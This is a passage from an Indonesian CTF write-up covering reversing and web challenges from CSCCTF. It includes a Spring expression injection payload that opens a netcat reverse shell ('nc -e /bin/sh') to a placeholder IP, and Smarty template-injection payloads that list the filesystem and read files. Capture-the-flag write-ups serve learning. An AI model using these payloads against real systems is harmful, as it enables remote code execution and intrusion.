&lt;p&gt;Ternyata flagnya adalah serial key tersebut, hanya saja ditambahkan karakter “-” tiap 5 karakter.&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag
&lt;/h3&gt;

&lt;p&gt;CSCCTF{745UI-82JFS-9KNDB-CBJO7-OUM4G}&lt;/p&gt;

&lt;h2&gt;
  
  
  Higher Please
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;Objective: Grab the flag!&lt;br&gt;
Author: darmads&lt;br&gt;
&lt;a href="https://drive.google.com/file/d/1PpoawEkFW0tIh_UmTlKVcERdQZ2YTc_o/view?usp=sharing" rel="noopener noreferrer"&gt;https://drive.google.com/file/d/1PpoawEkFW0tIh_UmTlKVcERdQZ2YTc_o/view?usp=sharing&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Technical Report
&lt;/h3&gt;

&lt;p&gt;Diberikan sebuah game dengan unity. Namun, karena kategori challenge ini adalah REVERSE, kami memutuskan untuk melakukan decompile terhadap file AssemblyC-Sharp.dll untuk melakukan reversing terhadap game tersebut. Pada hint juga disebutkan untuk menabrakkan diri ke tulisan FLAG untuk mendapatkan flag. Kami menggunakan dnSpy untuk mendecompile file tersebut dan mengcompilenya kembali dengan kode yang baru sehingga karakter kami bisa terbang dan menabrakkan diri terus menerus kepada flag, sayangnya flag tak kunjung muncul. Akhirnya kami putus asa dan salah satu dari team kami memiliki ide konyol untuk melakukan strings pada setiap file dan mencari string CSCCTF{ untuk mendapatkan flagnya.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FIMdfLsCmh_dp_nFEhP2gYPHewu0PT3JWLVW4hl_SYLiJPeNkjHjw56cotEZX4kLe6_pDA9KHHzQBuyTRg44gfqUjLcp0alsBJQ3Aesm4du-_GQLA7Ko_bYj9KDE8nZ8JOPVEBImD" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FIMdfLsCmh_dp_nFEhP2gYPHewu0PT3JWLVW4hl_SYLiJPeNkjHjw56cotEZX4kLe6_pDA9KHHzQBuyTRg44gfqUjLcp0alsBJQ3Aesm4du-_GQLA7Ko_bYj9KDE8nZ8JOPVEBImD" alt="file" width="640" height="165"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ternyata gamenya gak perlu di reverse &amp;gt;:(.&lt;br&gt;
Reversenya kox jadi forensic &amp;gt;:(.&lt;/p&gt;
&lt;h3&gt;
  
  
  Flag
&lt;/h3&gt;

&lt;p&gt;CSCCTF{1_H0pe_I_w4s_b0rn_T4ll3r}&lt;/p&gt;
&lt;h1&gt;
  
  
  Web Exploitation
&lt;/h1&gt;
&lt;h2&gt;
  
  
  Speliberg
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;Author: Siahaan&lt;/p&gt;

&lt;p&gt;&lt;a href="http://128.199.77.174:20203" rel="noopener noreferrer"&gt;http://128.199.77.174:20203&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Technical Report
&lt;/h3&gt;

&lt;p&gt;Diberikan sebuah web &amp;amp; source code nya yang di buat menggunakan bahasa pemrograman java. Berikut isi filenya&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FzGO_z2DXSochFlPhbOpStJKGjLVl3ZvtV5YBwwF5Im9Jnorr_jr1R2_gc9ThZmPtHcq0RZ7EJ5BkIcJYv6dgj_PUvKGQc_1C7L0nCnL94t4JBOOtXr6WGRncJc3EMjffPKLEBJO6" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FzGO_z2DXSochFlPhbOpStJKGjLVl3ZvtV5YBwwF5Im9Jnorr_jr1R2_gc9ThZmPtHcq0RZ7EJ5BkIcJYv6dgj_PUvKGQc_1C7L0nCnL94t4JBOOtXr6WGRncJc3EMjffPKLEBJO6" alt="source" width="286" height="285"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Dari file yang diberikan kami melihat adanya vuln rce yang terletak pada file &lt;em&gt;MovieController.java&lt;/em&gt; di variable expr yang bisa di esacape.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FJwG_Vclgwsi-XZl1CeBAvSBhF6dRMbh2OOGfbqnAldaq7UkFaVxADxqhH5kOqbOC2hmMG8t_SEvHEFekxTgV247jzWA_3VqbdGpN_iS7VGL0Myn4fZjRPDaJMPFnFhPqga1Vz3cW" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FJwG_Vclgwsi-XZl1CeBAvSBhF6dRMbh2OOGfbqnAldaq7UkFaVxADxqhH5kOqbOC2hmMG8t_SEvHEFekxTgV247jzWA_3VqbdGpN_iS7VGL0Myn4fZjRPDaJMPFnFhPqga1Vz3cW" alt="source java" width="1366" height="742"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Disini kami mencoba melakukan reverse shell pada input title dengan cara mengescape petik sebagai berikut:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;' + T(java.lang.Runtime).getRuntime().exec("nc -e /bin/sh your-ip-here") + ' 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FKCIDL5cMfMCVHgfomKguwtCQhS9miBJRce9vS-ByVvcPfhiw2tygqpjH2ajPN_dCfRxwdxOi0hIGIdkv5-0cuYVZgDzoeTI89Xjd0bEe4VW7Ihx1i1KYl9uMiu5nlOcGzfGEzK-R" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FKCIDL5cMfMCVHgfomKguwtCQhS9miBJRce9vS-ByVvcPfhiw2tygqpjH2ajPN_dCfRxwdxOi0hIGIdkv5-0cuYVZgDzoeTI89Xjd0bEe4VW7Ihx1i1KYl9uMiu5nlOcGzfGEzK-R" alt="ss" width="1091" height="661"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pada tab home kami ketikkan lagi payload tadi agar tereksekusi&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FvEN4vgB0Yw0w642kxardtHokOEWL8I3IDWlKAffAO8ESkxqTf93_EIFgCxrqRt9Q01ReVLTKOvbCS2TmLktTYdO4ZMVZokBgdswprpr1DQPY3audCH_89KJ2URcRdDv5D5Nzjzp9" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FvEN4vgB0Yw0w642kxardtHokOEWL8I3IDWlKAffAO8ESkxqTf93_EIFgCxrqRt9Q01ReVLTKOvbCS2TmLktTYdO4ZMVZokBgdswprpr1DQPY3audCH_89KJ2URcRdDv5D5Nzjzp9" alt="ss" width="1122" height="449"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F6MxiIa6IKcmUFJSjFgbCvWWiYawVUrnJ2wmqzbR_Qsw0b_ZlrK7wEOTxGGVbS7Mu73kgQCpIWnDQAM7rntb9vpgcySMST9na8hz2BbV8V8z-rbFPo4T3kcYTiHSxUYBzbEIWhXrp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F6MxiIa6IKcmUFJSjFgbCvWWiYawVUrnJ2wmqzbR_Qsw0b_ZlrK7wEOTxGGVbS7Mu73kgQCpIWnDQAM7rntb9vpgcySMST9na8hz2BbV8V8z-rbFPo4T3kcYTiHSxUYBzbEIWhXrp" alt="ss" width="684" height="398"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Flag ada di dir /. Tinggal di cat&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2F5y-SOqqD0yuSd10uJPyxHuQGJVhNUoy90AMCOlAH8qM1W9OfoJfHw1EqmV2FMDPsfPQqOIPuGJYnu7rOeQTFvuQ3cp23JZ1v03e9SFzTkAHqxh_LbaiQP3qsIR8J2tfT8272AjXd" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2F5y-SOqqD0yuSd10uJPyxHuQGJVhNUoy90AMCOlAH8qM1W9OfoJfHw1EqmV2FMDPsfPQqOIPuGJYnu7rOeQTFvuQ3cp23JZ1v03e9SFzTkAHqxh_LbaiQP3qsIR8J2tfT8272AjXd" alt="flag" width="267" height="47"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Flag
&lt;/h3&gt;

&lt;p&gt;CSCCTF{sst1_4lways_haz_freinds}&lt;/p&gt;

&lt;h2&gt;
  
  
  not-so-smart
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;I only wanna marry someone who's smarter than me - xomeone&lt;/p&gt;

&lt;p&gt;Author: ArkAngels&lt;/p&gt;

&lt;p&gt;Flag ada di /&lt;/p&gt;

&lt;p&gt;&lt;a href="http://128.199.77.174:20200" rel="noopener noreferrer"&gt;http://128.199.77.174:20200&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Technical Report
&lt;/h3&gt;

&lt;p&gt;Diberikan sebuah web dengan vuln SSTI, awalnya saya sangat terfokus pada payload SSTI pada Twig karena terlalu sering SSTI pake twig.&lt;/p&gt;

&lt;p&gt;Ternyata judul soal adalah hint dari challenge ini, akhirnya kami mencoba untuk memakai payload smarty. Berikut payload yang kami gunakan.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{php}echo `ls /`;{/php}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FxTWFXJQTylJsnoQt1g4XZnj7yWCAUe_6r5M9V412yX9vE2Tmb57-7_sz0MGtQO3pwSr_iOUP9vNugTSosoeA495wgBznw605RllfuTLSKi6Wb1U4u0IalPVfIQiB5aRxc6xwWnKq" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FxTWFXJQTylJsnoQt1g4XZnj7yWCAUe_6r5M9V412yX9vE2Tmb57-7_sz0MGtQO3pwSr_iOUP9vNugTSosoeA495wgBznw605RllfuTLSKi6Wb1U4u0IalPVfIQiB5aRxc6xwWnKq" alt="ss" width="1026" height="131"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Akhirnya berhasil ls. Selanjutnya tinggal cat flag tersebut dengan payload&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{php}echo `cat /f*`;{/php}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FsB8ygyABxOXyOM67Z0xwvFV-3HmJ8KeAh0pdvJ8u-yG0xJS9UNGWT3hN_fs7YD3LmTewGMnuBHdp-ZVMpxTSu9tw5sxJNXzWTE3RDT1fmSGEvHAYTQLZEa4eBzNMVjAfAd5K5jYr" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FsB8ygyABxOXyOM67Z0xwvFV-3HmJ8KeAh0pdvJ8u-yG0xJS9UNGWT3hN_fs7YD3LmTewGMnuBHdp-ZVMpxTSu9tw5sxJNXzWTE3RDT1fmSGEvHAYTQLZEa4eBzNMVjAfAd5K5jYr" alt="ss" width="516" height="101"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  FLAG
&lt;/h3&gt;

&lt;p&gt;CSCCTF{you_are_smarter_than_MEH!}&lt;/p&gt;

&lt;h2&gt;
  
  
  iHateDevelopers
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Executive Summary
&lt;/h3&gt;

&lt;p&gt;Author: Siahaan&lt;br&gt;
&lt;a href="http://128.199.77.174:20201" rel="noopener noreferrer"&gt;http://128.199.77.174:20201&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Technical Report
&lt;/h3&gt;

&lt;p&gt;Diberikan URL yang berisi permainan PacMan. Berikut penampakannya&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FNfEjJhp0ZInaGkfXamZGaPUUPECYhQOG-c2F3iXs-fcNRT3Cv1cSQ4boMYCe-FNJXltXo7PAM9mvxN6iWMjZSUg-h9U3v3YQRn9G9XgAFMG_CEVqve7zfUqKEA3otO3rhaAQP7RJ" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FNfEjJhp0ZInaGkfXamZGaPUUPECYhQOG-c2F3iXs-fcNRT3Cv1cSQ4boMYCe-FNJXltXo7PAM9mvxN6iWMjZSUg-h9U3v3YQRn9G9XgAFMG_CEVqve7zfUqKEA3otO3rhaAQP7RJ" alt="ss" width="429" height="519"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Ketika kita akan melihat source, kita disambut dengan alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2Ff7U_zT8_PZt2SVzIrTcQyrUG2SS9vsHf0b9zxxQEJSyQ4moFDjYm26zeg8V9Y6tEoJEGuIGNFVXaYyHZ5Z3Id21V_mLdZHfXsccUC8XveGHboIiRhDT9OXioRCDDWQPWqQJaGBjr" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2Ff7U_zT8_PZt2SVzIrTcQyrUG2SS9vsHf0b9zxxQEJSyQ4moFDjYm26zeg8V9Y6tEoJEGuIGNFVXaYyHZ5Z3Id21V_mLdZHfXsccUC8XveGHboIiRhDT9OXioRCDDWQPWqQJaGBjr" alt="ss" width="436" height="114"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Langsung saja kita mematikan JavaScript di browser, refresh page, view source. Ternyata flag ada langsung di source&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FyfGCl78Mzm1td86SICLKvUMjngpCMPtpsYZS7lBK9loF2mo3EYfv-7Sy8WCNdg4T1q19CulxlpYRzp4x_7TaI2COVKH_kjM64cPCHQl2DpbuYw9mRDR58u3jXk5dEC3ePJxIz_wp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FyfGCl78Mzm1td86SICLKvUMjngpCMPtpsYZS7lBK9loF2mo3EYfv-7Sy8WCNdg4T1q19CulxlpYRzp4x_7TaI2COVKH_kjM64cPCHQl2DpbuYw9mRDR58u3jXk5dEC3ePJxIz_wp" alt="ss" width="412" height="112"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  FLAG
&lt;/h3&gt;

&lt;p&gt;CSCCTF{for_those_wh0_rely_on_JS_4lone}&lt;/p&gt;

</description>
      <category>cryptography</category>
      <category>forensics</category>
      <category>reverseengineering</category>
      <category>webexploitation</category>
    </item>
  </channel>
</rss>
